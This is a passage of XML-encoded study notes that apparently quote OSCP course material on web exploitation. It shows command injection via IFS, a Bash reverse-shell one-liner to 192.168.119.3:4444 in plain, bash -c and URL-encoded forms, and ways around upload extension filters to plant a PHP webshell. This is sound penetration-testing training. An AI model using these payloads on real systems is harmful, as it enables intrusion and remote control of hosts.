      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D3B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read -r cmd arg &lt;&lt;&lt; "$input"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D3C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$cmd $arg</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 16 - IFS Example</w:t>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This takes the string and splits it based on the IFS. We can then run those commands without using the space character. With URLencoding, a space is represented as "%20". Let's do that now.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D41">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's replace the space with "%20" and press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Send</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1866900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 12: URL encoding a space with %20" id="403" name="image408.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 12: URL encoding a space with %20" id="0" name="image408.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId599"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1866900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 12: URL encoding a space with %20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D43">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 12 shows that our command executed correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D44">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We have achieved command execution on the target system and can leverage this to get a reverse shell or add our SSH key to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file for a user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D45">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's attempt to obtain a reverse shell by adding a command to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter. We can use a common</w:t>
      </w:r>
      <w:hyperlink r:id="rId600">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId601">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Bash TCP reverse shell one-liner</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The target IP for the reverse shell may need to be updated in the labs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D47">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i &gt;&amp; /dev/tcp/192.168.119.3/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D48">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 17 - Bash reverse shell one-liner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D49">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D4A">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we'll execute our command through the PHP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function, we should be aware that the command may be executed via the</w:t>
      </w:r>
      <w:hyperlink r:id="rId602">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId603">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Bourne Shell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, also known as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, rather than Bash. The reverse shell one-liner in Listing 17 contains syntax that is not supported by the Bourne Shell. To ensure the reverse shell is executed via Bash, we need to modify the reverse shell command. We can do this by providing the reverse shell one-liner as argument to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which executes a command with Bash.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D4B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -c "bash -i &gt;&amp; /dev/tcp/192.168.119.3/4444 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D4C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 18 - Bash reverse shell one-liner executed as command in Bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D4D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll once again encode the special characters with URL encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D4E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D4F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 19 - URL encoded Bash TCP reverse shell one-liner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D51">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The following figure shows the correct way to add our command in the request:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D52">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2895600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 13: Encoded Bash reverse shell in " id="334" name="image332.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 13: Encoded Bash reverse shell in " id="0" name="image332.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId604"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2895600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 13: Encoded Bash reverse shell in "cmd" parameter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D53">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before we send the request, let's start a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener on port 4444 on our Kali machine. It will receive the incoming reverse shell from the target system. Once the listener is started, we can press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Send</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Burp to send the request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D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56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5fp2fnkdwx29" w:id="243"/>
      <w:bookmarkEnd w:id="243"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypassing file extension filters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D58">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D59">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (9.3.1. Using Executable Files):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D5A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D5B">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 15 shows that we successfully uploaded our text file, so we know that the upload mechanism is not limited to images only. Next, let's attempt to upload the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">simple-backdoor.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> webshell used in the previous Learning Unit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5543550" cy="1524000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 16: Failed Upload of simple-backdoor.php" id="167" name="image159.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 16: Failed Upload of simple-backdoor.php" id="0" name="image159.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId605"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5543550" cy="1524000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 16: Failed Upload of simple-backdoor.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D5D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 16 shows that the web application blocked our upload, stating that PHP files are not allowed and files with PHP file extensions are blacklisted. Since don't know exactly how the filter is implemented, we'll use a trial-and-error approach to find ways to bypass it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D5E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One method to bypass this filter is to change the file extension to a less-commonly used</w:t>
      </w:r>
      <w:hyperlink r:id="rId606">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId607">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PHP file extension</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.phps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.php7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This may allow us to bypass simple filters that only check for the most common file extensions, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.phtml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. These alternative file extensions were mostly used for older versions of PHP or specific use cases but are still supported for compatibility in modern PHP versions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D5F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
